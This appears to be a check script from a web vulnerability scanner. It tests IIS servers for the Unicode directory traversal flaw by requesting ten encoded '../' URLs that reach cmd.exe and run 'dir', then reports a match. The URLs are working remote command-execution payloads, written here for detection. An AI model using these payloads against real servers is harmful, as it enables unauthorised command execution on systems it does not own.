#include helpers.inc;
#include classMatches.inc;
#include os_detection.inc;
	
// **************************************************************************************							 
function alert(fname, matchedText)
{	
	var ri = new TReportItem();
	ri.LoadFromFile(fname);
	ri.affects = "Web Server";
	ri.alertPath = "Scripts/" + fname; 	
		
	ri.setHttpInfo(lastJob);
		
	if (matchedText) 
		ri.Details =  ri.Details + "[break]Pattern found: [pre][blue]" + matchedText + "[/blue][/pre]";	
	
	addHTTPJobToCrawler(lastJob, 1, 1);
	
	AddReportItem(ri);	
}							 
// **************************************************************************************							 
function request(uri)
{
	lastJob = new THTTPJob();
		
	lastJob.url = scanURL;
	lastJob.addCookies = false;
	lastJob.verb = 'GET';
	lastJob.URI = uri;
	lastJob.execute();	
	if (!lastJob.wasError && lastJob.response.msg2 == 200 && !lastJob.notFound)
	{
		return true;
	}	
	
	return false;
}
// **************************************************************************************
function Test1()
{
	var urls = [
					"/scripts/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir",
					"/samples/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir",
					"/vti_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir",
					"/vti_cnf/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir",
					"/cgi-bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir",
					"/scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir",
					"/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir",
					"/vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir",
					"/vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir",
					"/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir"
				];
	
	matches.plainArray = [
						'Volume Serial Number is'
					  ];
	
	matches.regexArray = [
					  ];	
	
	for (var i=0;i<urls.length;i++)
	{ 	
		if (request(urls[i]))
		{
			var matchedText = matches.searchOnText(lastJob.response.body);	
			if (matchedText)
				alert("IIS_extended_unicode_directory_traversal_vulnerability.xml", matchedText); 	
		}
	}
}
// **************************************************************************************	
function startTesting()
{
	if (isIIS) Test1();
}
/***********************************************************************************/
/* main entry point */
var matches = new classMatches();
var lastJob = null;
startTesting();
